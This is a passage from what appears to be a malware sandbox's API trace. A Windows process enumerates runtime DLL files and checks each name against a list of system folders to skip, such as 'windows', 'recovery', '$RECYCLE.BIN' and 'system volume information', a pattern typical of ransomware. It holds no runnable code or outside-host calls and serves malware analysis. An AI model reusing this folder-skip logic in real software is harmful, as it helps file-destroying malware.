ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xd1e086ac, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xd2365abe, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x4ac0, dwReserved0=0x60002, dwReserved1=0x23307e, cFileName="api-ms-win-crt-locale-l1-1-0.dll", cAlternateFileName="APCB40~1.DLL")) returned 1 [0073.028] lstrcmpiW (lpString1="api-ms-win-crt-locale-l1-1-0.dll", lpString2=".") returned 1 [0073.028] lstrcmpiW (lpString1="api-ms-win-crt-locale-l1-1-0.dll", lpString2="..") returned 1 [0073.028] lstrcmpiW (lpString1="api-ms-win-crt-locale-l1-1-0.dll", lpString2="...") returned 1 [0073.028] lstrcmpiW (lpString1="api-ms-win-crt-locale-l1-1-0.dll", lpString2="windows") returned -1 [0073.028] lstrcmpiW (lpString1="api-ms-win-crt-locale-l1-1-0.dll", lpString2="recovery") returned -1 [0073.028] lstrcmpiW (lpString1="api-ms-win-crt-locale-l1-1-0.dll", lpString2="perflogs") returned -1 [0073.028] lstrcmpiW (lpString1="api-ms-win-crt-locale-l1-1-0.dll", lpString2="documents and settings") returned -1 [0073.028] lstrcmpiW (lpString1="api-ms-win-crt-locale-l1-1-0.dll", lpString2="$RECYCLE.BIN") returned 1 [0073.028] lstrcmpiW (lpString1="api-ms-win-crt-locale-l1-1-0.dll", lpString2="system volume information") returned -1 [0073.029] lstrcmpiW (lpString1="api-ms-win-crt-locale-l1-1-0.dll", lpString2="msocache") returned -1 [0073.029] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c118 [0073.029] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="api-ms-win-crt-locale-l1-1-0.dll", cchWideChar=32, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 32 [0073.029] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0073.029] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="api-ms-win-crt-locale-l1-1-0.dll", cchWideChar=32, lpMultiByteStr=0x22d0a0, cbMultiByte=32, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="api-ms-win-crt-locale-l1-1-0.dll", lpUsedDefaultChar=0x0) returned 32 [0073.029] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c118 | out: hHeap=0x1e0000) returned 1 [0073.029] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c068 [0073.029] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="api-ms-win-crt-locale-l1-1-0.dll", cchWideChar=32, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 32 [0073.029] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0073.029] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="api-ms-win-crt-locale-l1-1-0.dll", cchWideChar=32, lpMultiByteStr=0x22d260, cbMultiByte=32, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="api-ms-win-crt-locale-l1-1-0.dll", lpUsedDefaultChar=0x0) returned 32 [0073.029] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c068 | out: hHeap=0x1e0000) returned 1 [0073.029] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d098 [0073.029] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cea0 | out: hHeap=0x1e0000) returned 1 [0073.029] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0073.029] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0073.029] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xd1137cdf, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xd1137cdf, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xd1d23858, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x6cc0, dwReserved0=0x60002, dwReserved1=0x23307e, cFileName="api-ms-win-crt-math-l1-1-0.dll", cAlternateFileName="APAE51~1.DLL")) returned 1 [0073.029] lstrcmpiW (lpString1="api-ms-win-crt-math-l1-1-0.dll", lpString2=".") returned 1 [0073.029] lstrcmpiW (lpString1="api-ms-win-crt-math-l1-1-0.dll", lpString2="..") returned 1 [0073.029] lstrcmpiW (lpString1="api-ms-win-crt-math-l1-1-0.dll", lpString2="...") returned 1 [0073.029] lstrcmpiW (lpString1="api-ms-win-crt-math-l1-1-0.dll", lpString2="windows") returned -1 [0073.029] lstrcmpiW (lpString1="api-ms-win-crt-math-l1-1-0.dll", lpString2="recovery") returned -1 [0073.029] lstrcmpiW (lpString1="api-ms-win-crt-math-l1-1-0.dll", lpString2="perflogs") returned -1 [0073.029] lstrcmpiW (lpString1="api-ms-win-crt-math-l1-1-0.dll", lpString2="documents and settings") returned -1 [0073.029] lstrcmpiW (lpString1="api-ms-win-crt-math-l1-1-0.dll", lpString2="$RECYCLE.BIN") returned 1 [0073.029] lstrcmpiW (lpString1="api-ms-win-crt-math-l1-1-0.dll", lpString2="system volume information") returned -1 [0073.029] lstrcmpiW (lpString1="api-ms-win-crt-math-l1-1-0.dll", lpString2="msocache") returned -1 [0073.029] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20e418 [0073.029] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="api-ms-win-crt-math-l1-1-0.dll", cchWideChar=30, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 30 [0073.029] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0073.029] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="api-ms-win-crt-math-l1-1-0.dll", cchWideChar=30, lpMultiByteStr=0x241268, cbMultiByte=30, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="api-ms-win-crt-math-l1-1-0.dll", lpUsedDefaultChar=0x0) returned 30 [0073.029] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20e418 | out: hHeap=0x1e0000) returned 1 [0073.029] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20e268 [0073.029] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="api-ms-win-crt-math-l1-1-0.dll", cchWideChar=30, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 30 [0073.029] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2412e0 [0073.029] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="api-ms-win-crt-math-l1-1-0.dll", cchWideChar=30, lpMultiByteStr=0x2412e0, cbMultiByte=30, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="api-ms-win-crt-math-l1-1-0.dll", lpUsedDefaultChar=0x0) returned 30 [0073.030] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20e268 | out: hHeap=0x1e0000) returned 1 [0073.030] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d140 [0073.030] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d098 | out: hHeap=0x1e0000) returned 1 [0073.030] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2412e0 | out: hHeap=0x1e0000) returned 1 [0073.030] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0073.030] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xd1006983, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xd1006983, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xd1242d5d, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x68c0, dwReserved0=0x60002, dwReserved1=0x23307e, cFileName="api-ms-win-crt-multibyte-l1-1-0.dll", cAlternateFileName="AP972F~1.DLL")) returned 1 [0073.030] lstrcmpiW (lpString1="api-ms-win-crt-multibyte-l1-1-0.dll", lpString2=".") returned 1 [0073.030] lstrcmpiW (lpString1="api-ms-win-crt-multibyte-l1-1-0.dll", lpString2="..") returned 1 [0073.030] lstrcmpiW (lpString1="api-ms-win-crt-multibyte-l1-1-0.dll", lpString2="...") returned 1 [0073.030] lstrcmpiW (lpString1="api-ms-win-crt-multibyte-l1-1-0.dll", lpString2="windows") returned -1 [0073.030] lstrcmpiW (lpString1="api-ms-win-crt-multibyte-l1-1-0.dll", lpString2="recovery") returned -1 [0073.030] lstrcmpiW (lpString1="api-ms-win-crt-multibyte-l1-1-0.dll", lpString2="perflogs") returned -1 [0073.030] lstrcmpiW (lpString1="api-ms-win-crt-multibyte-l1-1-0.dll", lpString2="documents and settings") returned -1 [0073.030] lstrcmpiW (lpString1="api-ms-win-crt-multibyte-l1-1-0.dll", lpString2="$RECYCLE.BIN") returned 1 [0073.030] lstrcmpiW (lpString1="api-ms-win-crt-multibyte-l1-1-0.dll", lpString2="system volume information") returned -1 [0073.030] lstrcmpiW (lpString1="api-ms-win-crt-multibyte-l1-1-0.dll", lpString2="msocache") returned -1 [0073.030] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c5e8 [0073.030] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="api-ms-win-crt-multibyte-l1-1-0.dll", cchWideChar=35, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 35 [0073.030] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0073.030] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="api-ms-win-crt-multibyte-l1-1-0.dll", cchWideChar=35, lpMultiByteStr=0x22d0a0, cbMultiByte=35, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="api-ms-win-crt-multibyte-l1-1-0.dll", lpUsedDefaultChar=0x0) returned 35 [0073.030] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c5e8 | out: hHeap=0x1e0000) returned 1 [0073.030] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c5e8 [0073.030] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="api-ms-win-crt-multibyte-l1-1-0.dll", cchWideChar=35, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 35 [0073.030] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0073.030] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="api-ms-win-crt-multibyte-l1-1-0.dll", cchWideChar=35, lpMultiByteStr=0x22d260, cbMultiByte=35, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="api-ms-win-crt-multibyte-l1-1-0.dll", lpUsedDefaultChar=0x0) returned 35 [0073.030] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c5e8 | out: hHeap=0x1e0000) returned 1 [0073.030] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x2362f8 [0073.030] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d140 | out: hHeap=0x1e0000) returned 1 [0073.030] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0073.030] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0073.030] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xd0f9426a, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xd0f9426a, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xd121c9ea, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x114c0, dwReserved0=0x60002, dwReserved1=0x23307e, cFileName="api-ms-win-crt-private-l1-1-0.dll", cAlternateFileName="AP7D9E~1.DLL")) returned 1 [0073.030] lstrcmpiW (lpString1="api-ms-win-crt-private-l1-1-0.dll", lpString2=".") returned 1 [0073.030] lstrcmpiW (lpString1="api-ms-win-crt-private-l1-1-0.dll", lpString2="..") returned 1 [0073.030] lstrcmpiW (lpString1="api-ms-win-crt-private-l1-1-0.dll", lpString2="...") returned 1 [0073.030] lstrcmpiW (lpString1="api-ms-win-crt-private-l1-1-0.dll", lpString2="windows") returned -1 [0073.031] lstrcmpiW (lpString1="api-ms-win-crt-private-l1-1-0.dll", lpString2="recovery") returned -1 [0073.031] lstrcmpiW (lpString1="api-ms-win-crt-private-l1-1-0.dll", lpString2="perflogs") returned -1 [0073.031] lstrcmpiW (lpString1="api-ms-win-crt-private-l1-1-0.dll", lpString2="documents and settings") returned -1 [0073.031] lstrcmpiW (lpString1="api-ms-win-crt-private-l1-1-0.dll", lpString2="$RECYCLE.BIN") returned 1 [0073.031] lstrcmpiW (lpString1="api-ms-win-crt-private-l1-1-0.dll", lpString2="system volume information") returned -1 [0073.031] lstrcmpiW (lpString1="api-ms-win-crt-private-l1-1-0.dll", lpString2="msocache") returned -1 [0073.031] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c5e8 [0073.031] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="api-ms-win-crt-private-l1-1-0.dll", cchWideChar=33, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 33 [0073.031] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0073.031] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="api-ms-win-crt-private-l1-1-0.dll", cchWideChar=33, lpMultiByteStr=0x22d260, cbMultiByte=33, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="api-ms-win-crt-private-l1-1-0.dll", lpUsedDefaultChar=0x0) returned 33 [0073.031] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c5e8 | out: hHeap=0x1e0000) returned 1 [0073.031] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c220 [0073.031] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="api-ms-win-crt-private-l1-1-0.dll", cchWideChar=33, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 33 [0073.031] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0073.031] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="api-ms-win-crt-private-l1-1-0.dll", cchWideChar=33, lpMultiByteStr=0x22d298, cbMultiByte=33, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="api-ms-win-crt-private-l1-1-0.dll", lpUsedDefaultChar=0x0) returned 33 [0073.031] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c220 | out: hHeap=0x1e0000) returned 1 [0073.031] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d9c8 [0073.031] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2362f8 | out: hHeap=0x1e0000) returned 1 [0073.031] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0073.031] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0073.031] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xd0f9426a, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xd0f9426a, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xd139a18a, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x4cc0, dwReserved0=0x60002, dwReserved1=0x23307e, cFileName="api-ms-win-crt-process-l1-1-0.dll", cAlternateFileName="APFCAD~1.DLL")) returned 1 [0073.031] lstrcmpiW (lpString1="api-ms-win-crt-process-l1-1-0.dll", lpString2=".") returned 1 [0073.031] lstrcmpiW (lpString1="api-ms-win-crt-process-l1-1-0.dll", lpString2="..") returned 1 [0073.031] lstrcmpiW (lpString1="api-ms-win-crt-process-l1-1-0.dll", lpString2="...") returned 1 [0073.031] lstrcmpiW (lpString1="api-ms-win-crt-process-l1-1-0.dll", lpString2="windows") returned -1 [0073.031] lstrcmpiW (lpString1="api-ms-win-crt-process-l1-1-0.dll", lpString2="recovery") returned -1 [0073.031] lstrcmpiW (lpString1="api-ms-win-crt-process-l1-1-0.dll", lpString2="perflogs") returned -1 [0073.031] lstrcmpiW (lpString1="api-ms-win-crt-process-l1-1-0.dll", lpString2="documents and settings") returned -1 [0073.031] lstrcmpiW (lpString1="api-ms-win-crt-process-l1-1-0.dll", lpString2="$RECYCLE.BIN") returned 1 [0073.031] lstrcmpiW (lpString1="api-ms-win-crt-process-l1-1-0.dll", lpString2="system volume information") returned -1 [0073.031] lstrcmpiW (lpString1="api-ms-win-crt-process-l1-1-0.dll", lpString2="msocache") returned -1 [0073.031] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c3d8 [0073.031] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="api-ms-win-crt-process-l1-1-0.dll", cchWideChar=33, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 33 [0073.032] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0073.032] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="api-ms-win-crt-process-l1-1-0.dll", cchWideChar=33, lpMultiByteStr=0x22d0a0, cbMultiByte=33, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="api-ms-win-crt-process-l1-1-0.dll", lpUsedDefaultChar=0x0) returned 33 [0073.032] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c3d8 | out: hHeap=0x1e0000) returned 1 [0073.032] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c118 [0073.032] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="api-ms-win-crt-process-l1-1-0.dll", cchWideChar=33, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 33 [0073.032] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0073.032] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="api-ms-win-crt-process-l1-1-0.dll", cchWideChar=33, lpMultiByteStr=0x22d260, cbMultiByte=33, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="api-ms-win-crt-process-l1-1-0.dll", lpUsedDefaultChar=0x0) returned 33 [0073.032] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c118 | out: hHeap=0x1e0000) returned 1 [0073.032] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d728 [0073.032] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d9c8 | out: hHeap=0x1e0000) returned 1 [0073.032] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0073.032] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0073.032] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xd0eaf4e3, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xd0eaf4e3, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xd11d067c, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x5ac0, dwReserved0=0x60002, dwReserved1=0x23307e, cFileName="api-ms-win-crt-runtime-l1-1-0.dll", cAlternateFileName="AP8F34~1.DLL")) returned 1 [0073.032] lstrcmpiW (lpString1="api-ms-win-crt-runtime-l1-1-0.dll", lpString2=".") returned 1 [0073.032] lstrcmpiW (lpString1="api-ms-win-crt-runtime-l1-1-0.dll", lpString2="..") returned 1 [0073.032] lstrcmpiW (lpString1="api-ms-win-crt-runtime-l1-1-0.dll", lpString2="...") returned 1 [0073.032] lstrcmpiW (lpString1="api-ms-win-crt-runtime-l1-1-0.dll", lpString2="windows") returned -1 [0073.032] lstrcmpiW (lpString1="api-ms-win-crt-runtime-l1-1-0.dll", lpString2="recovery") returned -1 [0073.033] lstrcmpiW (lpString1="api-ms-win-crt-runtime-l1-1-0.dll", lpString2="perflogs") returned -1 [0073.033] lstrcmpiW (lpString1="api-ms-win-crt-runtime-l1-1-0.dll", lpString2="documents and settings") returned -1 [0073.033] lstrcmpiW (lpString1="api-ms-win-crt-runtime-l1-1-0.dll", lpString2="$RECYCLE.BIN") returned 1 [0073.033] lstrcmpiW (lpString1="api-ms-win-crt-runtime-l1-1-0.dll", lpString2="system volume information") returned -1 [0073.033] lstrcmpiW (lpString1="api-ms-win-crt-runtime-l1-1-0.dll", lpString2="msocache") returned -1 [0073.033] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c118 [0073.033] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="api-ms-win-crt-runtime-l1-1-0.dll", cchWideChar=33, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 33 [0073.033] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0073.033] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="api-ms-win-crt-runtime-l1-1-0.dll", cchWideChar=33, lpMultiByteStr=0x22d260, cbMultiByte=33, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="api-ms-win-crt-runtime-l1-1-0.dll", lpUsedDefaultChar=0x0) returned 33 [0073.033] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c118 | out: hHeap=0x1e0000) returned 1 [0073.033] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c5e8 [0073.033] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="api-ms-win-crt-runtime-l1-1-0.dll", cchWideChar=33, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 33 [0073.033] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0073.033] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="api-ms-win-crt-runtime-l1-1-0.dll", cchWideChar=33, lpMultiByteStr=0x22d298, cbMultiByte=33, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="api-ms-win-crt-runtime-l1-1-0.dll", lpUsedDefaultChar=0x0) returned 33 [0073.033] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c5e8 | out: hHeap=0x1e0000) returned 1 [0073.033] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23da70 [0073.033] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d728 | out: hHeap=0x1e0000) returned 1 [0073.033] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0073.033] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0073.033] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xd0dca676, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xd0dca676, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xd1078ffd, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x60c0, dwReserved0=0x60002, dwReserved1=0x23307e, cFileName="api-ms-win-crt-stdio-l1-1-0.dll", cAlternateFileName="APD1B7~1.DLL")) returned 1 [0073.033] lstrcmpiW (lpString1="api-ms-win-crt-stdio-l1-1-0.dll", lpString2=".") returned 1 [0073.033] lstrcmpiW (lpString1="api-ms-win-crt-stdio-l1-1-0.dll", lpString2="..") returned 1 [0073.033] lstrcmpiW (lpString1="api-ms-win-crt-stdio-l1-1-0.dll", lpString2="...") returned 1 [0073.033] lstrcmpiW (lpString1="api-ms-win-crt-stdio-l1-1-0.dll", lpString2="windows") returned -1 [0073.033] lstrcmpiW (lpString1="api-ms-win-crt-stdio-l1-1-0.dll", lpString2="recovery") returned -1 [0073.033] lstrcmpiW (lpString1="api-ms-win-crt-stdio-l1-1-0.dll", lpString2="perflogs") returned -1 [0073.033] lstrcmpiW (lpString1="api-ms-win-crt-stdio-l1-1-0.dll", lpString2="documents and settings") returned -1 [0073.033] lstrcmpiW (lpString1="api-ms-win-crt-stdio-l1-1-0.dll", lpString2="$RECYCLE.BIN") returned 1 [0073.033] lstrcmpiW (lpString1="api-ms-win-crt-stdio-l1-1-0.dll", lpString2="system volume information") returned -1 [0073.033] lstrcmpiW (lpString1="api-ms-win-crt-stdio-l1-1-0.dll", lpString2="msocache") returned -1 [0073.033] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dec0 [0073.033] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="api-ms-win-crt-stdio-l1-1-0.dll", cchWideChar=31, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 31 [0073.033] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2412e0 [0073.033] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="api-ms-win-crt-stdio-l1-1-0.dll", cchWideChar=31, lpMultiByteStr=0x2412e0, cbMultiByte=31, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="api-ms-win-crt-stdio-l1-1-0.dll", lpUsedDefaultChar=0x0) returned 31 [0073.034] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dec0 | out: hHeap=0x1e0000) returned 1 [0073.034] 